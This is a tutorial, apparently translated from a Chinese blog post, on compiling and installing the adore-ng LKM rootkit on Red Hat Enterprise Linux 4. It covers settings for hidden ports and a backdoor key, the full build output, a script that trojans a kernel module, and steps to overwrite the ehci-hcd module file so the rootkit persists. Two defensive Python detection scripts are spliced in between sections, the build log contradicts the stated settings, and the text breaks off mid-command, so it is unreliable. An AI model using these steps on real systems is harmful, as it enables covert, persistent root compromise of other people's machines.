Author: baoz
I wrote this article long ago and have moved it back here. It's strange: at that time I tested it and the port was hidden, but now I can't hide the port. The answer will come soon :)
The reason has been found. The problem is still the original one. If you run into similar problems, use the original version. If you want to know where the problem lies, run diff yourself.
Preface:
Kernel 2.6 has strode into the Linux world, and backdoor writing and webshell writing must keep up with the trend.
Abbreviations:
fc: Fedora Core
rh: Red Hat
rhel4: Red Hat Enterprise Linux 4
sk: SucKIT
adore: adore-ng
rk: rootkit
lkm: loadable kernel module
What is adore-ng?
Googling "adore" will give you plenty of details about this LKM rk.
Why choose it?
1. I could not get sk for 2.6.
2. /dev/kmem is disabled by default in rh kernels after fc2, so sk cannot inject into the kernel on the fly, and many rk-checking programs fail as well :)
3. adore is written by Daniel Stealth and has a long history, with more than N people helping him test it, so it should be more stable than other LKMs. The stability of an LKM seriously affects the stability of the system, so we must be cautious when choosing one: even if the features are good, if the system hangs after a little play you will be discovered by others.
Features:
[root@RHEL4 adore-ng]# cat FEATURES
If you never used adore before, here's a list of supported
things:
o runs on kernel 2.4.x UP and SMP systems
o runs on kernel 2.6.x UP and SMP systems, i386 and x86_64 archs tested
o file and directory hiding
o process hiding
o socket-hiding (no matter whether LISTENing, CONNECTED etc)
o full-capability back door
o does not utilize sys_call_table but VFS layer
o KISS principle, to have as less things in there as possible
  but also being as much powerful as possible
o hides itself from /proc and /sys filesystems
o syslog filtering: logs generated by hidden processes never appear
  on the syslog UNIX socket anymore
o wtmp/utmp/lastlog filtering: writing of xtmp entries by hidden processes
  do not appear in the file, unless you force it by using special hidden
  AND authenticated process (a sshd back door is usually only hidden thus
  xtmp entries written by sshd don't make it to disk)
o (optional) relinking of LKMs as described in phrack #61 aka LKM infection
  to make it possible to be automatically reloaded after reboots (2.4 and 2.6)
Environment:
A real machine, not a virtual machine.
[root@RHEL4 adore-ng]# uname -a; cat /etc/redhat-release
Linux RHEL4 2.6.9-5.EL #1 Wed Jan 5 19:22:18 EST 2005 i686 athlon i386 GNU/Linux
Red Hat Enterprise Linux AS release 4 (Nahant)
Download:
Google "adore-ng", or look for it on the website http://baoz.net.
Edit and compile:
[root@RHEL4 adore-ng]# mv Makefile.2.6 Makefile
Edit the following settings.
EXTRA_CFLAGS=-DELITE_UID=2618748389U -DELITE_GID=4063569279U
EXTRA_CFLAGS+=-DCURRENT_ADORE=54
EXTRA_CFLAGS+=-DADORE_KEY="fgjgggfd"
These are the hidden TCP ports. Do not change the trailing 0.
u_short HIDDEN_SERVICES[] =
{2222, 7350, 0};
If you have an SMP machine, enable the following.
EXTRA_CFLAGS+=-D__SMP__
Set the location of your kernel source.
KERNEL_SOURCE=/usr/src/linux
OK, save and exit, then make.
[root@RHEL4 adore-ng]# make
cc -DELITE_UID=2634745389U -DELITE_GID=6063589279U -DCURRENT_ADORE=54 -DADORE_KEY="djksdfnvn" -DHIDE ava.c libinvisible.c -o ava
ava.c:47: warning: integer constant is too large for "unsigned long" type
ava.c:47: warning: large integer implicitly truncated to unsigned type
libinvisible.c: In function 'adore_hidefile':
libinvisible.c:76: warning: integer constant is too large for "unsigned long" type
libinvisible.c:76: warning: large integer implicitly truncated to unsigned type
make -C /usr/src/linux SUBDIRS=`pwd` modules
make[1]: Entering directory `/usr/src/kernels/2.6.9-5.EL-i686'
  CC [M]  /root/adore-ng/adore-ng-2.6.o
/root/adore-ng/adore-ng-2.6.c:56: warning: 'MODULE_PARM_' is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c:59: warning: 'MODULE_PARM_' is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c:61: warning: 'MODULE_PARM_' is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c: In function 'adore_opt_filldir':
/root/adore-ng/adore-ng-2.6.c:281: warning: integer constant is too large for "unsigned long" type
/root/adore-ng/adore-ng-2.6.c:281: warning: comparison is always false due to limited range of data type
/root/adore-ng/adore-ng-2.6.c: In function 'adore_root_filldir':
/root/adore-ng/adore-ng-2.6.c:363: warning: integer constant is too large for "unsigned long" type
/root/adore-ng/adore-ng-2.6.c:363: warning: comparison is always false due to limited range of data type
  Building modules, stage 2.
  MODPOST
  CC      /root/adore-ng/adore-ng-2.6.mod.o
  LD [M]  /root/adore-ng/adore-ng-2.6.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.9-5.EL-i686'
cc -O2 symsed.c -o symsed
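The HIDDEN_SERVICES list above makes adore drop those ports from the socket table the kernel reports through /proc/net/tcp. The check below is an added example, not code from this article or from adore-ng: it compares the ports /proc/net/tcp admits to with the ports the kernel refuses to hand out on a fresh bind, since a hooked /proc reader filters the listing but the bind path still sees the real socket. It assumes it runs as root on Linux; the sample table is constructed.

```python
import errno
import socket

# Constructed sample of /proc/net/tcp (not captured from the article's host):
# row 0 is a listener on port 22 (0x0016), row 1 an established connection with local port 3306 (0x0CEA).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 00000000 100 0 0 10 0
   1: 0100007F:0CEA 0100007F:8AE2 01 00000000:00000000 00:00000000 00000000   500        0 5678 1 00000000 20 4 30 10 -1
"""

def local_ports(table: str) -> set:
    """Local TCP ports the kernel admits to in /proc/net/tcp or /proc/net/tcp6 text, in any state."""
    ports = set()
    for line in table.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) > 3:
            ports.add(int(fields[1].rsplit(":", 1)[1], 16))   # "ADDR:PORT", port in hex
    return ports

def port_in_use(port: int) -> bool:
    """True if a fresh bind on 0.0.0.0:port is refused because something already holds the port.
    Run as root: below port 1024 an unprivileged process gets EACCES, which tells us nothing."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.bind(("0.0.0.0", port))
        except OSError as e:
            return e.errno == errno.EADDRINUSE
    return False

def hidden_listeners(visible: set, candidates, in_use=port_in_use) -> list:
    """Ports the kernel refuses to hand out but that are absent from the socket table.
    in_use is injectable so the logic can be exercised without touching real sockets."""
    return [p for p in candidates if p not in visible and in_use(p)]

def scan(candidates=range(1, 65536)) -> list:
    """Read both socket tables and probe every candidate port against them."""
    visible = set()
    for path in ("/proc/net/tcp", "/proc/net/tcp6"):
        try:
            with open(path) as f:
                visible |= local_ports(f.read())
        except OSError:
            pass
    return hidden_listeners(visible, candidates)

if __name__ == "__main__":
    print("ports held by the kernel but missing from /proc/net/tcp*:", scan())
```

A port bound by a socket that is neither listed nor bindable is worth explaining before blaming a rootkit; compare with a boot from trusted media if the kernel itself is in doubt.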
Let's talk about its relink feature, which links adore into another module. Let's see what it does:
# $lkm_path is the path of the module chosen as the host, set earlier in the script
system("cp $lkm_path t.ko");
system("./symsed t.ko zero; ld -r adore-ng-2.6.ko t.ko -o z.ko; rm -f t.ko");
print "\nCopy trojaned LKM back to original LKM? (y/n) \n";
while ($yn !~ /^(y|n)$/i) {
    $yn = <STDIN>;
    $yn =~ s/\n//;
}
if ($yn =~ /y/i) {
    system("cp z.ko $lkm_path");
} else {
    print "\nOutput LKM is z.ko\n";
}
On RHEL4 the relinked module fails to load when I insert it, but it doesn't matter: we don't insert it, we replace it :)
Few people run modprobe -r after installing the system, so we can easily replace a module the system does not really need. Let's look at my modules.
[root@RHEL4 adore-ng]# lsmod
Module                  Size  Used by
dm_mod                 54741  0
ohci_hcd               21713  0
snd_intel8x0           33769  0
snd_ac97_codec         63889  1 snd_intel8x0
snd_pcm_oss            49017  0
snd_mixer_oss          17985  1 snd_pcm_oss
snd_pcm                96841  2 snd_intel8x0,snd_pcm_oss
snd_timer              29893  1 snd_pcm
snd_page_alloc          9673  2 snd_intel8x0,snd_pcm
snd_mpu401_uart         8769  1 snd_intel8x0
snd_rawmidi            26597  1 snd_mpu401_uart
snd_seq_device          8137  1 snd_rawmidi
snd                    54949  9 snd_intel8x0,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device
soundcore               9889  1 snd
sis900                 18756  0
ext3                  116809  1
jbd                    71257  1 ext3
We choose a module with "Used by" 0 that is not very useful, such as a USB driver.
I have already used ehci_hcd, so it no longer shows up here. ohci_hcd or the sound card modules would also do.
See where it is:
[root@RHEL4 adore-ng]# modprobe -l | grep ehci
/lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko
Unload it:
[root@RHEL4 adore-ng]# modprobe -r ehci-hcd
Replace it:
[root@RHEL4 adore-ng]# cp adore-ng-2.6.ko /lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko
Load it:
[root@RHEL4 adore-ng]# modprob
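Overwriting a vendor module file in place, as done above, leaves the RPM database disagreeing with what is on disk: the packaged ehci-hcd.ko now has a different size and checksum. The script below is an added example, not from this article or adore-ng: it parses `rpm -V` output for kernel-module files whose content changed or that went missing, and separately lists .ko files under the module tree that no package owns. It assumes an RPM-based system like the RHEL4 host above; the sample verification output is constructed.

```python
import os
import subprocess

# Constructed `rpm -V kernel` output (not from the article's host). Attribute string: S size,
# 5 md5, T mtime, "." unchanged; "missing" means the packaged file is gone; "c" marks a config file.
SAMPLE_RPM_VERIFY = """\
S.5....T    /lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko
.......T    /lib/modules/2.6.9-5.EL/kernel/fs/ext3/ext3.ko
missing     /lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ohci-hcd.ko
.......T  c /boot/config-2.6.9-5.EL
"""

def parse_rpm_verify(output: str):
    """Yield (flags, path) pairs from `rpm -V` output, skipping the optional one-letter file-type
    marker (c config, d doc, g ghost, l license, r readme) some lines carry between flags and path."""
    for line in output.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 2:
            continue
        if len(parts) == 3 and len(parts[1]) == 1 and parts[1] in "cdglr":
            yield parts[0], parts[2]
        else:
            yield parts[0], line.split(None, 1)[1]

def suspicious_modules(output: str, release: str) -> list:
    """Module files under /lib/modules/<release> whose size or checksum differ from the package,
    or that are missing. An mtime-only change (T) is ignored; a swapped-in .ko changes content."""
    tree = f"/lib/modules/{release}/"
    hits = []
    for flags, path in parse_rpm_verify(output):
        if path.startswith(tree) and path.endswith(".ko"):
            if flags == "missing" or "5" in flags or "S" in flags:
                hits.append((path, flags))
    return hits

def unowned_modules(release: str) -> list:
    """Module files in the tree that no package claims; `rpm -qf` reports each as not owned."""
    tree = f"/lib/modules/{release}/"
    files = [os.path.join(d, f) for d, _, fs in os.walk(tree) for f in fs if f.endswith(".ko")]
    if not files:
        return []
    out = subprocess.run(["rpm", "-qf"] + files, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True).stdout
    return [l.split()[1] for l in out.splitlines() if l.endswith("is not owned by any package")]

if __name__ == "__main__":
    release = os.uname().release
    pkg = subprocess.run(["rpm", "-qf", f"/lib/modules/{release}/kernel"], capture_output=True, text=True).stdout.strip()
    verify = subprocess.run(["rpm", "-V", pkg], capture_output=True, text=True).stdout
    print("changed or missing:", suspicious_modules(verify, release))
    print("unowned:", unowned_modules(release))
```

Both checks trust the local rpm database and the running kernel, so when a loaded LKM is suspected, run them against the disk mounted from a trusted boot (rpm --root) rather than on the live system.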